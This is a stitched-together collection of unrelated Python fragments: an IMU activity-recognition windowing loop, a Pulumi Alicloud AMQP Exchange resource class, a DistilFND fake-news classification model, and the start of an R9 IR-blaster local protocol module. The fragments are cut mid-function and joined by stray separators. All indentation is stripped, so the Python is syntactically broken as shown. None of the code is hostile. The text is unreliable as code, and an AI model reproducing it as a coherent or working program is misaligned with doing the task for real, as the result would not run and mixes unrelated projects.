ss = ws * 0.25
ss = int(ss * fs)
ws = int(ws * fs)
argv_list = ['roll_w', 'pitch_w', 'yaw_w','accel_x', 'accel_y', 'accel_z', 'gyro_x', 'gyro_y', 'gyro_z']
start = 0
end = start + ws
#print 'ss: ', ss
#print 'ws: ', ws
#if get_traning_data:
feature_header = ['label_index', 'label']
stat_feature = ['_mean', '_median', '_var', '_meanCrossCount']
#feature_list = np.zeros(len(argv_list)* len(stat_feature) )
if n_sample <= 0:
n_sample = 45
for fe in stat_feature:
for arg in argv_list:
feature_header.append(arg+fe)
#print 'feature_header: ', feature_header
n_feature = len(feature_header)
feature_header.append('estimate_label')
feature_header.append('estimate_label_index')
feature_list = pd.DataFrame(columns= feature_header).dropna();
feature_list.loc[0] = 0
win_n = 0
i = 0
real_stream_start = 0
real_stream_end = 0
real_ws = 5
epoch_time = 0
format_time_t = ''
if save_data == 'test_simple':
act_COUNT = 0
act_wind_count = 0
bow_features = pd.DataFrame(columns= ['start_time', 'end_time'] + label_index.keys() )
bow_features.loc[act_COUNT] = 0
unit_pattern_list = []
res_label = 'NA'
f_gui = open('to_gui.csv', 'w+')
gui_string_ = 'time,estimated_unit_pattern,estimated_activity\n'
f_gui.write(gui_string_)
#try:
if True:
while 1:
if end < df.shape[0]:
sliding_window = df.iloc[start:end]
#epoch_time = df.index[start]
format_time_t = df['formatted_time'][start]
if save_data == 'test_simple':
if act_wind_count == 0 :
bow_features.loc[act_COUNT]['start_time'] = format_time_t
act_wind_count +=1
elif act_wind_count == aws:
bow_features.loc[act_COUNT]['end_time'] = format_time_t
file_name = 'stream_' + pattern_name + '_.txt'
tmp_test = bow_features.loc[act_COUNT]
#print 'before: tmp_test :', tmp_test, '\n', tmp_test.shape
tmp_test = tmp_test.ix[2:].values
#print 'tmp_test :', tmp_test
test_label = -1
#print 'act_pca_: ', act_pca_
res_label_index = testing_accuracy(tmp_test, test_label, act_pca_, act_model_, activity = True )
#print 'res_label_index: ', res_label_index
res_label = act_index_label[res_label_index[0]]
with open(file_name, 'wa') as f:
for item in unit_pattern_list:
f.write("%s, " % item)
f.write("\n\n")
unit_pattern_list = []
act_COUNT +=1
print '*************************act_COUNT: ', act_COUNT
bow_features.loc[act_COUNT] = 0
act_wind_count = 0
else:
act_wind_count +=1
#print '#####################act_COUNT: ', act_COUNT
#print '#####################act_wind_count: ', act_wind_count
sliding_window = sliding_window[argv_list].astype(np.float).dropna()
print '$sliding_window number: $', win_n, ' index start: ', start, ' end: ', end#, ':\n', sliding_window
### withou normlaization of the sliding window
feature = calculate_stat(sliding_window)
#print 'first, feature size: ', feature.shape, ' feature: ', feature
#feature = np.insert(feature, 0, label)
#print 'feature size: ', feature.shape, ' feature: ', feature
#feature_list = np.vstack((feature_list, feature))
#print 'pattern_name: ', pattern_name
if pattern_name in label_index.keys() :
feature_list.ix[win_n, 0:2] = [label_index[pattern_name], pattern_name]
else:
#print 'feature_list: ', feature_list
#print 'feature_list.ix[win_n, 0:2]: ', feature_list.ix[win_n, 0:2]
feature_list.ix[win_n, 0:2] = [-1, pattern_name]
feature_list.ix[win_n, 2:n_feature] = feature
#print 'feature_list.index: ', feature_list.index
#print 'feature_list.index[win_n]: ', feature_list.index[win_n]
#feature_list.index = format_time_t
win_n += 1
if get_traning_data:
feature_list.ix[win_n, -2:] = 'NA'
if win_n == n_sample:
break
else:
real_stream_end = win_n
if real_stream_end - real_stream_start >= real_ws:
df_tmp = feature_list.ix[real_stream_start: real_stream_end ].convert_objects()
#print 'df_tmp&&&&&&&&&&&&&&&&&&&&&: ', df_tmp
[df_test, test_label] = get_sample_label( df_tmp )
#### double check wether you need scale df_test
est_label_k = testing_accuracy(df_test, test_label, pca_, model_ )
#print '$$$$$$$$$$$ df_test shape: ', df_test.shape
"""
### K Means model
kmeans_test_pred = cluster_model_.predict(df_test) + 1
kmeans_distance = kmeans_dist(cluster_model_.cluster_centers_, df_test)
print '$$$$$$$$$$$$$$$$$$$$$$$$kmeans_distance: \n', kmeans_distance
kmeans_test_min_distance_index = np.argmin(kmeans_distance , axis=1) + 1
print '$$$$$$$$$$$$$$$$$$$$$$$kmeans_test_pred:', kmeans_test_pred
print '$$$$$$$$$$kmeans_test_min_distance_index ', kmeans_test_min_distance_index
"""
### GMM Model
#c_test_pred_prob = cluster_model_.predict_proba(df_test)
#c_test_prob_label | |
The message is routed to the bound queue by comparing the message's Headers attribute key-value pairs with the binding attribute key-value pairs.
:param pulumi.Input[str] instance_id: The ID of the instance.
:param pulumi.Input[bool] internal: Specifies whether an exchange is an internal exchange. Valid values:
* false: The exchange is not an internal exchange.
* true: The exchange is an internal exchange.
:param pulumi.Input[str] virtual_host_name: The name of virtual host where an exchange resides.
"""
if alternate_exchange is not None:
pulumi.set(__self__, "alternate_exchange", alternate_exchange)
if auto_delete_state is not None:
pulumi.set(__self__, "auto_delete_state", auto_delete_state)
if exchange_name is not None:
pulumi.set(__self__, "exchange_name", exchange_name)
if exchange_type is not None:
pulumi.set(__self__, "exchange_type", exchange_type)
if instance_id is not None:
pulumi.set(__self__, "instance_id", instance_id)
if internal is not None:
pulumi.set(__self__, "internal", internal)
if virtual_host_name is not None:
pulumi.set(__self__, "virtual_host_name", virtual_host_name)
@property
@pulumi.getter(name="alternateExchange")
def alternate_exchange(self) -> Optional[pulumi.Input[str]]:
"""
The alternate exchange. An alternate exchange is configured for an existing exchange. It is used to receive messages that fail to be routed to queues from the existing exchange.
"""
return pulumi.get(self, "alternate_exchange")
@alternate_exchange.setter
def alternate_exchange(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alternate_exchange", value)
@property
@pulumi.getter(name="autoDeleteState")
def auto_delete_state(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the Auto Delete attribute is configured. Valid values:
* true: The Auto Delete attribute is configured. If the last queue that is bound to an exchange is unbound, the exchange is automatically deleted.
* false: The Auto Delete attribute is not configured. If the last queue that is bound to an exchange is unbound, the exchange is not automatically deleted.
"""
return pulumi.get(self, "auto_delete_state")
@auto_delete_state.setter
def auto_delete_state(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_delete_state", value)
@property
@pulumi.getter(name="exchangeName")
def exchange_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the exchange. It must be 1 to 255 characters in length, and can contain only letters, digits, hyphens (-), underscores (_), periods (.), and at signs (@).
"""
return pulumi.get(self, "exchange_name")
@exchange_name.setter
def exchange_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exchange_name", value)
@property
@pulumi.getter(name="exchangeType")
def exchange_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the exchange. Valid values:
* FANOUT: An exchange of this type routes all the received messages to all the queues bound to this exchange. You can use a fanout exchange to broadcast messages.
* DIRECT: An exchange of this type routes a message to the queue whose binding key is exactly the same as the routing key of the message.
* TOPIC: This type is similar to the direct exchange type. An exchange of this type routes a message to one or more queues based on the fuzzy match or multi-condition match result between the routing key of the message and the binding keys of the current exchange.
* HEADERS: An exchange of this type uses the Headers property instead of the routing key for matching.
When you bind a headers exchange to a queue, you set key-value pairs as the binding attributes;
when you send a message to the exchange, you set key-value pairs in the message's Headers property.
The message is routed to the bound queue when the message's Headers attributes match the binding attributes.
"""
return pulumi.get(self, "exchange_type")
@exchange_type.setter
def exchange_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exchange_type", value)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the instance.
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter
def internal(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether an exchange is an internal exchange. Valid values:
* false: The exchange is not an internal exchange.
* true: The exchange is an internal exchange.
"""
return pulumi.get(self, "internal")
@internal.setter
def internal(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "internal", value)
@property
@pulumi.getter(name="virtualHostName")
def virtual_host_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the virtual host where the exchange resides.
"""
return pulumi.get(self, "virtual_host_name")
@virtual_host_name.setter
def virtual_host_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_host_name", value)
class Exchange(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alternate_exchange: Optional[pulumi.Input[str]] = None,
auto_delete_state: Optional[pulumi.Input[bool]] = None,
exchange_name: Optional[pulumi.Input[str]] = None,
exchange_type: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
internal: Optional[pulumi.Input[bool]] = None,
virtual_host_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a RabbitMQ (AMQP) Exchange resource.
For information about RabbitMQ (AMQP) Exchange and how to use it, see [What is Exchange](https://help.aliyun.com/).
> **NOTE:** Available in v1.128.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_virtual_host = alicloud.amqp.VirtualHost("exampleVirtualHost",
instance_id="amqp-abc12345",
virtual_host_name="my-VirtualHost")
example_exchange = alicloud.amqp.Exchange("exampleExchange",
auto_delete_state=False,
exchange_name="my-Exchange",
exchange_type="DIRECT",
instance_id=example_virtual_host.instance_id,
internal=False,
virtual_host_name=example_virtual_host.virtual_host_name)
```
## Import
RabbitMQ (AMQP) Exchange can be imported using the id, e.g.
```sh
$ pulumi import alicloud:amqp/exchange:Exchange example <instance_id>:<virtual_host_name>:<exchange_name>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] alternate_exchange: The alternate exchange. An alternate exchange is configured for an existing exchange. It is used to receive messages that fail to be routed to queues from the existing exchange.
:param pulumi.Input[bool] auto_delete_state: Specifies whether the Auto Delete attribute is configured. Valid values:
* true: The Auto Delete attribute is configured. If the last queue that is bound to an exchange is unbound, the exchange is automatically deleted.
* false: The Auto Delete attribute is not configured. If the last queue that is bound to an exchange is unbound, the exchange is not automatically deleted.
:param pulumi.Input[str] exchange_name: The name of the exchange. It must be 1 to 255 characters in length, and can contain only letters, digits, hyphens (-), underscores (_), periods (.), and at signs (@).
:param pulumi.Input[str] exchange_type: The type of the exchange. Valid values:
* FANOUT: An exchange of this type routes all the received messages to all the queues bound to this exchange. You can use a fanout exchange to broadcast messages.
* DIRECT: An exchange of this type routes a message to the queue whose binding key is exactly the same as the routing key of the message.
* TOPIC: This type is similar to the direct exchange type. An exchange of this type routes a message to one or more queues based on the fuzzy match or multi-condition match result between the routing key of the message and the binding keys of the current exchange.
* HEADERS: An exchange of this type uses the Headers property instead of the routing key for matching.
When you bind a headers exchange to a queue, you set key-value pairs as the binding attributes;
when you send a message to the exchange, you set key-value pairs in the message's Headers property.
The message is routed to the bound queue when the message's Headers attributes match the binding attributes.
:param pulumi.Input[str] instance_id: The ID of the instance.
:param pulumi.Input[bool] internal: Specifies whether an exchange is an internal exchange. Valid values:
* false: The exchange is not an internal exchange.
* true: The exchange is an internal exchange.
:param pulumi.Input[str] virtual_host_name: The name of the virtual host where the exchange resides.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ExchangeArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a RabbitMQ (AMQP) Exchange resource.
For information about RabbitMQ (AMQP) Exchange and how to use it, see [What is Exchange](https://help.aliyun.com/).
> **NOTE:** Available in v1.128.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_virtual_host = alicloud.amqp.VirtualHost("exampleVirtualHost",
instance_id="amqp-abc12345",
virtual_host_name="my-VirtualHost")
example_exchange = alicloud.amqp.Exchange("exampleExchange",
auto_delete_state=False,
exchange_name="my-Exchange",
exchange_type="DIRECT",
instance_id=example_virtual_host.instance_id,
internal=False,
virtual_host_name=example_virtual_host.virtual_host_name)
```
## Import
RabbitMQ (AMQP) Exchange can be imported using the id, e.g.
```sh
$ pulumi import alicloud:amqp/exchange:Exchange example <instance_id>:<virtual_host_name>:<exchange_name>
```
:param str resource_name: The name of the resource.
:param ExchangeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ExchangeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alternate_exchange: Optional[pulumi.Input[str]] = None,
auto_delete_state: Optional[pulumi.Input[bool]] = None,
exchange_name: Optional[pulumi.Input[str]] = None,
exchange_type: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
internal: Optional[pulumi.Input[bool]] = None,
virtual_host_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not | |
############ DISTILFND Class ############
"""
Author: <NAME>
Date: 26.09.2021
Master thesis: Explanatory detection of fake news with Deep Learning
University: University of Hagen, Hagen, Germany, Faculty for Mathematics and Computer Science
"""
# Importing needed modules
from PIL import Image, ImageFile
# Truncating images if too large
ImageFile.LOAD_TRUNCATED_IMAGES = True
# Increasing maximum image pixel size
Image.MAX_IMAGE_PIXELS = 933120000
# Importing Pytorch and transformers from HuggingFace
import torch
from torch import nn
from torchvision import models, transforms
from transformers import DistilBertTokenizer, DistilBertModel
# Importing visualization tools
import seaborn as sns
from pylab import rcParams
# Setting style of seaborn graphic visualization
sns.set(style="whitegrid", palette="muted", font_scale=1.2)
COLOR_PALETTE = ["#01BEFE", "#FFDD00", "#FF7D00", "#FF006D", "#ADFF02", "#8F00FF"]
sns.set_palette(sns.color_palette(COLOR_PALETTE))
# Setting parameter figure sizes
rcParams["figure.figsize"] = 12, 8
# Fake News subtypes in order of Fakeddit benchmark dataset labeling
CLASS_NAMES = ["True", "Satire / Parody", "False Conn.", "Impost. Content", "Man. Content", "Mis. Content"]
class DistilFND(nn.Module):
def __init__(self, num_classes):
"""
Constructor function for initializing DistilFND model
:param num_classes: number of output classes (here 6, the length of CLASS_NAMES)
"""
super(DistilFND, self).__init__()
# Loading DistilBertModel with pre-trained model weights from English lower case text corpus
# and assigning to title_module (Title-Feature Extractor)
self.title_module = DistilBertModel.from_pretrained("distilbert-base-uncased")
# Loading ResNet34 model with pre-trained model weights from ImageNet 2012 Benchmark dataset
# and assigning to image_module (Image-Feature Extractor)
self.image_module = models.resnet34(pretrained=True)
# Loading DistilBertModel with pre-trained model weights from English lower and upper case text corpus
# and assigning to comment_module (Comment-Feature Extractor)
self.comment_module = DistilBertModel.from_pretrained("distilbert-base-cased")
# Dropout layer to randomly nullify 30% of elements of output tensors --> Useful only in model training
# Layer is still needed for loading model
self.drop = nn.Dropout(p=0.3)
# Fully connected layers (Linear layer) to reshape dimensionality of output tensors ([batch_size, num_classes])
# Reshaping title feature tensor (768,) --> (1, 6)
self.fc_title = nn.Linear(in_features=self.title_module.config.hidden_size, out_features=num_classes, bias=True)
# Reshaping comment feature tensor (768,) --> (1, 6)
self.fc_comment = nn.Linear(in_features=self.comment_module.config.hidden_size, out_features=num_classes,
bias=True)
# Reshaping image feature tensor (1, 1000) --> (1, 6)
self.fc_image = nn.Linear(in_features=1000, out_features=num_classes, bias=True)
# Final model prediction via Softmax activation function
self.softmax = nn.Softmax(dim=1)
def forward(self, title_input_ids, title_attention_mask, image, cm_input_ids, cm_attention_mask):
"""
Forward function feeds input data to layers of DistilFND model --> operational function in
order to produce a prediction for given Reddit post sample. Forward function accepts input_ids
and attention_mask from post title and comment data (generated through tokenize function) and
numeric image vector representation (generated through process_image function)
:param title_input_ids:
:param title_attention_mask:
:param image:
:param cm_input_ids:
:param cm_attention_mask:
:return:
"""
# Applying title_module onto post_title input_ids and attention_mask
# Returning title feature tensor of shape (768,)
title_last_hidden_states = self.title_module(
input_ids=title_input_ids,
attention_mask=title_attention_mask,
return_dict=False
)
# List Slicing operation applied to output of last hidden layer of DistilBert model in order to
# only return tensor representation of aggregated classification output ([CLS] token)
# and assign to pooled output variable
title_pooled_output = title_last_hidden_states[0][:, 0, :]
# Random element nullification of pooled output tensor (not applied during usage of web application)
# Layer is still needed for loading model
title_pooled_output = self.drop(title_pooled_output)
# Output from ResNet34 in shape = (1, 1000), one logit per class of the ImageNet dataset
image_output = self.image_module(image)
# Random element nullification of image output tensor (not applied during usage of web application)
# Layer is still needed for loading model
image_output = self.drop(image_output)
# Applying comment_module onto post_comments input_ids and attention_mask
# Returning comment feature tensor of shape (768,)
cm_last_hidden_states = self.comment_module(
input_ids=cm_input_ids,
attention_mask=cm_attention_mask,
return_dict=False
)
# List Slicing operation applied to output of last hidden layer of DistilBert model in order to
# only return tensor representation of aggregated classification output ([CLS] token)
# and assign to pooled output variable
cm_pooled_output = cm_last_hidden_states[0][:, 0, :]
# Random element nullification of pooled output tensor (not applied during usage of web application)
# Layer is still needed for loading model
cm_pooled_output = self.drop(cm_pooled_output)
# Linear layers per title, image and comment tensor output to convert into aligned dimensionality
# Takes as input the respective title, image and comment tensors and reshapes to shape = (1, 6)
# for [one sample, 6 defined classes]
title_condensed = self.fc_title(title_pooled_output)
image_condensed = self.fc_image(image_output)
cm_condensed = self.fc_comment(cm_pooled_output)
# Now, feature vector presentation of different modalities can be merged to one feature representation
# Merging title and image output tensor to multi-modal feature representation via element-wise maximum method
fusion = torch.maximum(title_condensed, image_condensed)
# Adding comment features element-wise to the corresponding multi-modal feature dimensions as a 'booster' for
# the most dominant feature representation per class, i.e. per subtype of Fake News
fusion = torch.add(fusion, cm_condensed)
# Applying Softmax activation function on complete feature vector
# to return class-specific probability distribution
return self.softmax(fusion)
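# Illustrative note (assumption, not in the original source): the element-wise
# maximum keeps, per class, whichever of the title or image branch is more
# confident, and the comment branch is then added on top, e.g.:
#
#   torch.maximum(torch.tensor([[0.2, 0.9]]), torch.tensor([[0.5, 0.1]]))  # -> [[0.5, 0.9]]
#   torch.add(torch.tensor([[0.5, 0.9]]), torch.tensor([[0.1, 0.3]]))      # -> [[0.6, 1.2]]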
def load_model(self):
"""
Loading and initializing the best DistilFND model (accuracy of 87.97%), trained on 20% of the Fakeddit dataset
:return distilfnd (loaded and trained DistilFND model variable):
"""
# Initializing DistilFND model class with CLASS_NAMES constant (length of 6 classes)
distilFND = DistilFND(len(CLASS_NAMES))
# Loading dictionary state of saved DistilFND and assigning resources to CPU
distilFND.load_state_dict(torch.load("dataset/models/distilfnd_model.pth", map_location=torch.device("cpu")))
# Returning loaded and prediction ready DistilFND model
return distilFND
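# Hedged end-to-end usage sketch (assumption -- the image file name is
# illustrative only; it mirrors the tokenize/process_image/forward methods of this class):
#
#   model = DistilFND(len(CLASS_NAMES)).load_model()
#   t_ids, t_mask, c_ids, c_mask = model.tokenize("post title", "top comment")
#   img = model.process_image(Image.open("example_post.jpg"))
#   probs = model(t_ids, t_mask, img, c_ids, c_mask)  # shape (1, 6)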
def tokenize(self, post_title, post_comments):
"""
Tokenize function in order to convert raw input data into tokenized feature representations
:param post_title:
:param post_comments:
:return:
"""
# Loading corresponding DistilBertTokenizer for lower case and lower + upper case
# English text corpus --> Assigning to corresponding tokenizer variables
title_tokenizer = DistilBertTokenizer.from_pretrained("distilbert-base-uncased")
comment_tokenizer = DistilBertTokenizer.from_pretrained("distilbert-base-cased")
# Applying title_tokenizer onto post_title input sequence via encoding_plus function
# Return is a tokenized sequence of length MAX_LEN = 80
title_encoding = title_tokenizer.encode_plus(
post_title,
# Setting max length to maximum 80 tokens per sequence
max_length=80,
# Right-side padding to max length with [PAD] token
padding="max_length",
truncation=True,
# Adding special tokens [CLS], [SEP] and [PAD]
add_special_tokens=True,
return_token_type_ids=False,
return_attention_mask=True,
# Returning PyTorch tensor
return_tensors="pt",
)
# Try-Except clause for handling exception if comment data non-existent
try:
# Applying comment_tokenizer onto comment input sequence via encoding_plus function
# Return is a tokenized sequence of length MAX_LEN = 80
comment_encoding = comment_tokenizer.encode_plus(
post_comments,
# Setting max length to maximum 80 tokens per sequence
max_length=80,
# Right-side padding to max length with [PAD] token
padding="max_length",
truncation=True,
# Adding special tokens [CLS], [SEP] and [PAD]
add_special_tokens=True,
return_token_type_ids=False,
return_attention_mask=True,
# Returning PyTorch tensors
return_tensors="pt",
)
# Handling ValueError if post has no associated comments
except ValueError:
# Initializing post_comments variable with empty string
post_comments = ""
# Applying encode_plus function to empty string
comment_encoding = comment_tokenizer.encode_plus(
post_comments,
# Setting max length to maximum 80 tokens per sequence
max_length=80,
# Right-side padding to max length with [PAD] token
padding="max_length",
truncation=True,
# Adding special tokens [CLS], [SEP] and [PAD]
add_special_tokens=True,
return_token_type_ids=False,
return_attention_mask=True,
# Returning PyTorch tensors
return_tensors="pt",
)
# Assigning input_ids and attention_mask tensors from corresponding encode_plus function
# to matching title and comment encoding variables
title_input_ids = title_encoding["input_ids"]
title_attention_mask = title_encoding["attention_mask"]
comment_input_ids = comment_encoding["input_ids"]
comment_attention_mask = comment_encoding["attention_mask"]
# Returning tokenized encoding input_ids and attention_mask tensors for post title and comments
return title_input_ids, title_attention_mask, comment_input_ids, comment_attention_mask
def process_image(self, image):
"""
Processing function to convert raw input image into feature vector representation
:param image:
:return image (processed):
"""
# Converting raw input image into vector representation via transform function
transform = transforms.Compose([
# Resizing raw input image to size of 256
transforms.Resize(256),
# Cropping image to size of height x width = 224 x 224
transforms.CenterCrop(224),
# Converting image file to PyTorch tensor
transforms.ToTensor(),
# Applying normalization to image tensor
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
])
# If the image does not have 3 color channels, convert it to RGB
if image.mode != "RGB":
image = image.convert("RGB")
# Apply transform function on input image --> Returns 3-dimensional image tensor of shape
# [3, 224, 224] = [color_channel, height in pixel, width in pixel]
image = transform(image)
# Apply unsqueeze function to reshape tensor to 4-dimensional tensor carrying the num_images
# as first position --> [1, 3, 224, 224] = [num_images, color_channels, height, width]
image = torch.unsqueeze(image, 0)
# Return processed image which | |
'''
Created on 28 apr 2019
@author: Matteo
'''
import traceback
import struct
import asyncio
from base64 import b64decode, b64encode
import json
import time
from Crypto.Cipher import AES
import random
import string
import binascii
from hashlib import md5
from . import _LOGGER
from .const import (CD_ADD_AND_CONTINUE_WAITING, CD_RETURN_IMMEDIATELY, CD_CONTINUE_WAITING, CD_ABORT_AND_RETRY)
from .asyncio_udp import open_local_endpoint
DEFAULT_PORT = 6668
class R9:
STUDY_KEY_DICT = {
"devId": '',
"dps": {
"1": "study_key",
"10": 300,
"7": '',
# "8": keyorig
},
"t": 0,
"uid": ''
}
STUDY_KEY_COMMAND = 7
STUDY_KEY_RESP_1_COMMAND = 7
STUDY_EXIT_COMMAND = 7
STUDY_EXIT_RESP_COMMAND = 8
STUDY_COMMAND = 7
STUDY_RESP_COMMAND = 8
STUDY_DICT = {
"devId": '',
"dps": {
"1": "study",
"10": 300
},
"t": 0,
"uid": ''
}
STUDY_EXIT_DICT = {
"devId": '',
"dps": {
"1": "study_exit",
"10": 300
},
"t": 0,
"uid": ''
}
ASK_LAST_DICT = {
"devId": '',
"gwId": ''
}
ASK_LAST_COMMAND = 0x0a
ASK_LAST_RESP_COMMAND = 0x0a
PING_COMMAND = 9
PING_RESP_COMMAND = 9
PING_DICT = {
}
PROTOCOL_VERSION_BYTES = b'3.1'
LEARNED_COMMAND = 8
crc32Table = [
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA,
0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3,
0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988,
0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91,
0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,
0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC,
0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5,
0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172,
0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940,
0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,
0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116,
0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F,
0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D,
0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A,
0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,
0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818,
0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E,
0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457,
0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C,
0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,
0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB,
0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0,
0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9,
0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086,
0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4,
0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD,
0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A,
0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683,
0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,
0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE,
0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7,
0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC,
0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252,
0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,
0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60,
0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79,
0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F,
0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04,
0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,
0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A,
0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38,
0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21,
0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E,
0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,
0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45,
0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2,
0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB,
0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0,
0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6,
0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF,
0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94,
0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D
]
@staticmethod
def crc32(cbytes):
crc = 0xFFFFFFFF
for b in cbytes:
crc = (crc >> 8) ^ R9.crc32Table[(crc ^ b) & 255]
return crc ^ 0xFFFFFFFF
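# Hedged sanity check (not part of the original source): the table-driven
# routine above is the standard reflected CRC-32, so it should agree with
# Python's binascii.crc32, e.g.:
#
#   import binascii
#   assert R9.crc32(b"tuya") == binascii.crc32(b"tuya") & 0xFFFFFFFF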
@staticmethod
def _pad(s):
padnum = 16 - len(s) % 16
return s + padnum * chr(padnum)
@staticmethod
def _unpad(s):
return s[:-ord(s[len(s)-1:])]
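# Hedged illustration (assumption, not in the original source): _pad/_unpad are
# PKCS#7-style character padding to the 16-byte AES block size, so a round trip
# is the identity and padded strings always align to the block size:
#
#   assert R9._unpad(R9._pad("study_key")) == "study_key"
#   assert len(R9._pad("study_key")) % 16 == 0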
@staticmethod
def check_discovery_packet(retdata, addr):
lenorig = len(retdata)
if lenorig <= 12 + 8 + 8:
_LOGGER.warning("CheckResp small len=%d", lenorig)
return CD_CONTINUE_WAITING
